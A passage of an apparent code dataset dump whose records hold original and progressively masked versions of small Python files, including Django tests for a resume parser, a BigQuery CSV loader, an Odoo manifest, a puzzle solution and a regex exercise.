= self.generate_counter('TariqAliProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = 'Tariq Ali'\n actual_name = self.generate_name('TariqAliProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Tariq_Ali')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = 'Dan Bernier'\n actual_name = self.generate_name('DanBernierProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dan_bernier_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('DanBernierProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC':\n 3, 'C#': 2, 'Swift': 1})\n actual_counter = self.generate_counter('DylanHirschkornProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3,\n 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2,\n 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter('SeanDuganMurphyProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('SeanDuganMurphyProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter('Christopher_Salat_Ceev')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_christopher_salat_ceev_name(self):\n expected_name = 'Christopher Salat'\n actual_name = self.generate_name('Christopher_Salat_Ceev')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Christopher_Salat_Ceev')\n self.assertEqual(expected_email, actual_email)\n",
"step-4": "from __future__ import unicode_literals\nfrom django.test import TestCase\nfrom collections import Counter\nimport generator.resume_parser as resume_parser\nimport os\nimport json\n\n\nclass TestResumeParser(TestCase):\n\n def load_resume(self, resume_name):\n path_to_directory = 'generator/fixtures/{resume_name}.pdf'.format(\n resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file['counter']\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['name']\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file['email']\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3,\n 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': \n 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1,\n 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter('TariqAliProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = 'Tariq Ali'\n actual_name = self.generate_name('TariqAliProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('TariqAliProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3,\n 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++':\n 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1,\n '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1,\n 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter('Tariq_Ali')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = 'Tariq\\xa0Ali'\n actual_name = self.generate_name('Tariq_Ali')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Tariq_Ali')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3,\n 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1,\n 'Scheme': 1})\n actual_counter = self.generate_counter('DanBernierProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = 'Dan Bernier'\n actual_name = self.generate_name('DanBernierProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dan_bernier_profile_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('DanBernierProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC':\n 3, 'C#': 2, 'Swift': 1})\n actual_counter = self.generate_counter('DylanHirschkornProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = 'Dylan Hirschkorn'\n actual_name = self.generate_name('DylanHirschkornProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('DylanHirschkornProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3,\n 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2,\n 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter('SeanDuganMurphyProfile')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n expected_name = 'Sean Dugan'\n actual_name = self.generate_name('SeanDuganMurphyProfile')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = ''\n actual_email = self.generate_email('SeanDuganMurphyProfile')\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter('Christopher_Salat_Ceev')\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_christopher_salat_ceev_name(self):\n expected_name = 'Christopher Salat'\n actual_name = self.generate_name('Christopher_Salat_Ceev')\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = '[email protected]'\n actual_email = self.generate_email('Christopher_Salat_Ceev')\n self.assertEqual(expected_email, actual_email)\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\n\nfrom collections import Counter\n\nimport generator.resume_parser as resume_parser\nimport os\nimport json\n\nclass TestResumeParser(TestCase):\n def load_resume(self, resume_name):\n path_to_directory = \"generator/fixtures/{resume_name}.pdf\".format(resume_name=resume_name)\n file_path = os.path.abspath(path_to_directory)\n json_string = resume_parser.convert(file_path)\n json_file = json.loads(json_string)\n return json_file\n\n def convert_to_counter(self, json_file):\n counter = json_file[\"counter\"]\n return Counter(counter)\n\n def generate_counter(self, resume_name):\n json_file = self.load_resume(resume_name)\n return self.convert_to_counter(json_file)\n\n def generate_name(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file[\"name\"]\n\n def generate_email(self, resume_name):\n json_file = self.load_resume(resume_name)\n return json_file[\"email\"]\n\n def test_parse_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 8, 'Rails': 5, 'WordPress': 3, 'Bootstrap': 2, 'JavaScript': 1, 'jQuery': 1, '.NET': 1, 'C#': 1, 'RSpec': 1, 'Sinatra': 1, 'C++': 1, 'Angular': 1, 'Javascript': 1, 'Ethereum': 1, 'blockchain': 1})\n actual_counter = self.generate_counter(\"TariqAliProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_tariq_ali_profile_name(self):\n expected_name = \"Tariq Ali\"\n actual_name = self.generate_name(\"TariqAliProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_tariq_ali_profile_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"TariqAliProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_second_tariq_ali_profile_counter(self):\n expected_counter = Counter({'Ruby': 15, 'Rails': 5, 'WordPress': 3, 'Angular': 3, 'Sinatra': 2, 'jQuery': 2, 'JavaScript': 2, 'C++': 2, 'Twitter': 2, 'Javascript': 2, 'Bootstrap': 2, 'GitHub': 1, '.NET': 1, 'RSpec': 1, 'blockchain': 1, 'Ethereum': 1, 'Capistrano': 1, 'AWS': 1, 'C#': 1, 'React': 1})\n actual_counter = self.generate_counter(\"Tariq_Ali\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_second_tariq_ali_profile_name(self):\n expected_name = \"Tariq\\xa0Ali\"\n actual_name = self.generate_name(\"Tariq_Ali\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_second_tariq_ali_profile_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"Tariq_Ali\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dan_bernier_profile_counter(self):\n expected_counter = Counter({'Ruby': 7, 'Processing': 4, 'C#': 3, 'Rails': 2, 'Javascript': 1, '.NET': 1, 'JavaScript': 1, 'Scheme': 1})\n actual_counter = self.generate_counter(\"DanBernierProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dan_bernier_profile_name(self):\n expected_name = \"Dan Bernier\"\n actual_name = self.generate_name(\"DanBernierProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dan_bernier_profile_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"DanBernierProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_dylan_hirschkorn_profile_counter(self):\n expected_counter = Counter({'Dylan': 3, 'Visual Basic': 3, 'BASIC': 3, 'C#': 2, 'Swift': 1})\n # This is a bug, Dylan only mentioned \"Visual Basic\", not \"Basic\" on his resume. However, I do not know of a good way of fixing this specific edge case. Also, Dylan is the name of a programming language, which is why Dylan shows up in the counter.\n actual_counter = self.generate_counter(\"DylanHirschkornProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_dylan_hirschkorn_profile_name(self):\n expected_name = \"Dylan Hirschkorn\"\n actual_name = self.generate_name(\"DylanHirschkornProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_dylan_hirschkorn_profile_email(self):\n expected_email = \"\"\n actual_email = self.generate_email(\"DylanHirschkornProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_sean_dugan_murphy_profile_counter(self):\n expected_counter = Counter({'Swift': 11, 'Twitter': 3, 'Objective-C': 3, 'Facebook': 3, 'GitHub': 2, 'YouTube': 2, 'CSS': 1, 'C#': 1})\n actual_counter = self.generate_counter(\"SeanDuganMurphyProfile\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_sean_dugan_murphy_profile_name(self):\n # The full name of the candidate is Sean Dugan Murphy. However we assume that a candidate only has a first and last name...and ignore the edge case where a candidate has a middle name.\n expected_name = \"Sean Dugan\"\n actual_name = self.generate_name(\"SeanDuganMurphyProfile\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_sean_dugan_murphy_profile_email(self):\n expected_email = \"\"\n actual_email = self.generate_email(\"SeanDuganMurphyProfile\")\n self.assertEqual(expected_email, actual_email)\n\n def test_parse_christopher_salat_ceev_counter(self):\n # Note that Christopher Salat does not actually know either PHP or Scratch. He links to several websites that end with the .php extension and he serves as a Scratch DJ. This indicates a problem with relying solely on keywords detached from the context.\n expected_counter = Counter({'YouTube': 5, 'PHP': 2, 'Scratch': 1})\n actual_counter = self.generate_counter(\"Christopher_Salat_Ceev\")\n self.assertEqual(expected_counter, actual_counter)\n\n def test_parse_christopher_salat_ceev_name(self):\n expected_name = \"Christopher Salat\"\n actual_name = self.generate_name(\"Christopher_Salat_Ceev\")\n self.assertEqual(expected_name, actual_name)\n\n def test_parse_christopher_salat_ceev_email(self):\n expected_email = \"[email protected]\"\n actual_email = self.generate_email(\"Christopher_Salat_Ceev\")\n self.assertEqual(expected_email, actual_email)\n",
"step-ids": [
10,
22,
24,
25,
26
]
}
|
[
10,
22,
24,
25,
26
] |
import os
from google.cloud import bigquery
def csv_loader(data, context):
client = bigquery.Client()
dataset_id = os.environ['DATASET']
dataset_ref = client.dataset(dataset_id)
job_config = bigquery.LoadJobConfig()
job_config.schema = [
bigquery.SchemaField('id', 'INTEGER'),
bigquery.SchemaField('first_name', 'STRING'),
bigquery.SchemaField('last_name', 'STRING'),
bigquery.SchemaField('email', 'STRING'),
bigquery.SchemaField('gender', 'STRING'),
bigquery.SchemaField('ip_address', 'STRING')
]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
# get the URI for uploaded CSV in GCS from 'data'
uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
# lets do this
load_job = client.load_table_from_uri(
uri,
dataset_ref.table(os.environ['TABLE']),
job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
print('Function=csv_loader, Version=' + os.environ['VERSION'])
print('File: {}'.format(data['name']))
load_job.result() # wait for table load to complete.
print('Job finished.')
destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))
print('Loaded {} rows.'.format(destination_table.num_rows))
|
normal
|
{
"blob_id": "01467a4dad3255a99025c347469881a71ffbae7c",
"index": 8179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-3": "import os\nfrom google.cloud import bigquery\n\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [bigquery.SchemaField('id', 'INTEGER'), bigquery.\n SchemaField('first_name', 'STRING'), bigquery.SchemaField(\n 'last_name', 'STRING'), bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'), bigquery.SchemaField(\n 'ip_address', 'STRING')]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n load_job = client.load_table_from_uri(uri, dataset_ref.table(os.environ\n ['TABLE']), job_config=job_config)\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n load_job.result()\n print('Job finished.')\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE'])\n )\n print('Loaded {} rows.'.format(destination_table.num_rows))\n",
"step-4": "import os\nfrom google.cloud import bigquery\n\ndef csv_loader(data, context):\n client = bigquery.Client()\n dataset_id = os.environ['DATASET']\n dataset_ref = client.dataset(dataset_id)\n job_config = bigquery.LoadJobConfig()\n job_config.schema = [\n bigquery.SchemaField('id', 'INTEGER'),\n bigquery.SchemaField('first_name', 'STRING'),\n bigquery.SchemaField('last_name', 'STRING'),\n bigquery.SchemaField('email', 'STRING'),\n bigquery.SchemaField('gender', 'STRING'),\n bigquery.SchemaField('ip_address', 'STRING')\n ]\n job_config.skip_leading_rows = 1\n job_config.source_format = bigquery.SourceFormat.CSV\n\n # get the URI for uploaded CSV in GCS from 'data'\n uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']\n\n # lets do this\n load_job = client.load_table_from_uri(\n uri,\n dataset_ref.table(os.environ['TABLE']),\n job_config=job_config)\n\n print('Starting job {}'.format(load_job.job_id))\n print('Function=csv_loader, Version=' + os.environ['VERSION'])\n print('File: {}'.format(data['name']))\n\n load_job.result() # wait for table load to complete.\n print('Job finished.')\n\n destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))\n print('Loaded {} rows.'.format(destination_table.num_rows))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*- coding: utf-8 -*-
{
'name': 'EDC Analytic Entry',
'depends': [
'stock_account',
'purchase_stock',
'account_accountant',
],
"description": """
""",
'author': "Ejaftech",
'data': [
'views/account_move_view.xml',
],
}
|
normal
|
{
"blob_id": "797e7c1b3e8b41a167bfbedfb6a9449e6426ba22",
"index": 8570,
"step-1": "<mask token>\n",
"step-2": "{'name': 'EDC Analytic Entry', 'depends': ['stock_account',\n 'purchase_stock', 'account_accountant'], 'description': '\\n ',\n 'author': 'Ejaftech', 'data': ['views/account_move_view.xml']}\n",
"step-3": "# -*- coding: utf-8 -*-\n{\n 'name': 'EDC Analytic Entry',\n 'depends': [\n 'stock_account',\n 'purchase_stock',\n 'account_accountant',\n\n ],\n \"description\": \"\"\"\n \"\"\",\n 'author': \"Ejaftech\",\n\n 'data': [\n 'views/account_move_view.xml',\n ],\n}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python
import sys
total = 0
for line in sys.stdin:
edges = [int(x) for x in line.split("x")]
edges.sort()
ribbon = sum(x * 2 for x in edges[:2])
l, w, h = edges
bow = l * w * h
total += bow + ribbon
print(total)
|
normal
|
{
"blob_id": "ed85cb61f4bc8bf758dafb10ffbabf87fb4521d0",
"index": 9281,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n edges = [int(x) for x in line.split('x')]\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n l, w, h = edges\n bow = l * w * h\n total += bow + ribbon\nprint(total)\n",
"step-3": "<mask token>\ntotal = 0\nfor line in sys.stdin:\n edges = [int(x) for x in line.split('x')]\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n l, w, h = edges\n bow = l * w * h\n total += bow + ribbon\nprint(total)\n",
"step-4": "import sys\ntotal = 0\nfor line in sys.stdin:\n edges = [int(x) for x in line.split('x')]\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n l, w, h = edges\n bow = l * w * h\n total += bow + ribbon\nprint(total)\n",
"step-5": "#!/usr/bin/env python\n\nimport sys\n\ntotal = 0\nfor line in sys.stdin:\n edges = [int(x) for x in line.split(\"x\")]\n\n edges.sort()\n ribbon = sum(x * 2 for x in edges[:2])\n\n l, w, h = edges\n bow = l * w * h\n\n total += bow + ribbon\n\nprint(total)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming.txt') as f_obj:
lines = f_obj.readlines()
m_lines = []
for line in lines:
m_line = line.replace('python', 'C#')
m_lines.append(m_line)
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\programming1.txt', 'w') as f_obj:
for line in m_lines:
f_obj.write(line)
with open('D:\Documents\PythonDocs\ehmatthes-pcc-f555082\chapter_10\guestbook.txt', 'w') as f_obj:
while True:
username = input('Please input your name. ')
if username == 'q':
break
else:
t = str(datetime.datetime.now())
f_obj.write(username + ' has visited at ' + t + '\n')
|
normal
|
{
"blob_id": "03da813650d56e7ab92885b698d4af3a51176903",
"index": 3878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\n<mask token>\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-3": "<mask token>\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-4": "import datetime\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming.txt'\n ) as f_obj:\n lines = f_obj.readlines()\nm_lines = []\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\programming1.txt'\n , 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\nwith open(\n 'D:\\\\Documents\\\\PythonDocs\\\\ehmatthes-pcc-f555082\\\\chapter_10\\\\guestbook.txt'\n , 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-5": "import datetime\n\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming.txt') as f_obj:\n lines = f_obj.readlines()\n\nm_lines = []\n\nfor line in lines:\n m_line = line.replace('python', 'C#')\n m_lines.append(m_line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\programming1.txt', 'w') as f_obj:\n for line in m_lines:\n f_obj.write(line)\n\nwith open('D:\\Documents\\PythonDocs\\ehmatthes-pcc-f555082\\chapter_10\\guestbook.txt', 'w') as f_obj:\n while True:\n username = input('Please input your name. ')\n if username == 'q':\n break\n else:\n t = str(datetime.datetime.now())\n f_obj.write(username + ' has visited at ' + t + '\\n')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
Created on 13 Dec 2016
@author: hpcosta
'''
# https://www.hackerrank.com/challenges/backreferences-to-failed-groups
regex = r"^\d{2}(-?)\d{2}\1\d{2}\1\d{2}$" # Do not delete 'r'.
import re
print(str(bool(re.search(regex, raw_input()))).lower())
# Task
#
# You have a test string S.
# Your task is to write a regex which will match S, with following condition(s):
#
# S consists of 8 digits.
# S may have "-" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)
# Valid
#
# 12345678
# 12-34-56-87
# Invalid
#
# 1-234-56-78
# 12-45-7810
|
normal
|
{
"blob_id": "e884ce5878de75afe93085e2310b4b8d5953963a",
"index": 337,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-3": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\n<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-4": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\nimport re\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-5": "'''\nCreated on 13 Dec 2016\n\n@author: hpcosta\n'''\n# https://www.hackerrank.com/challenges/backreferences-to-failed-groups\n\nregex = r\"^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$\" # Do not delete 'r'.\n\nimport re\n\nprint(str(bool(re.search(regex, raw_input()))).lower())\n\n\n\n# Task\n# \n# You have a test string S. \n# Your task is to write a regex which will match S, with following condition(s):\n# \n# S consists of 8 digits.\n# S may have \"-\" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)\n# Valid \n# \n# 12345678\n# 12-34-56-87\n# Invalid \n# \n# 1-234-56-78\n# 12-45-7810",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 3.0.1 on 2020-01-11 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0004_auto_20191230_2037'),
]
operations = [
migrations.AddField(
model_name='user',
name='circles',
field=models.CharField(choices=[('NUX', 'NUXPIA'), ('NET', 'NET'), ('DOT', 'DOT-GABI'), ('IMA', 'IMAGINE'), ('PNN', 'P&N'), ('MEG', 'MEGA-BRAIN')], max_length=18, null=True, verbose_name='동아리'),
),
migrations.AddField(
model_name='user',
name='department',
field=models.CharField(choices=[('OTHERS', '학부생이 아님'), ('CS', '컴퓨터공학부'), ('DRON', '드론IOT시뮬레이션학부'), ('MED', '의과대학'), ('LIB', '문리과대학'), ('SOC', '사회과학대학'), ('ENG', '공과대학'), ('HEL', '보건의료융합대학'), ('BNIT', 'BNIT융합대학'), ('PHA', '약학대학')], max_length=24, null=True, verbose_name='학과'),
),
migrations.AlterField(
model_name='user',
name='level',
field=models.CharField(choices=[('3', 'Lv3_미인증사용자'), ('2', 'Lv2_인증사용자'), ('1', 'Lv1_관리자'), ('0', 'Lv0_개발자')], default=3, max_length=18, verbose_name='등급'),
),
]
|
normal
|
{
"blob_id": "6aa762165dba891a3638d13862019dd342a7e05a",
"index": 7644,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
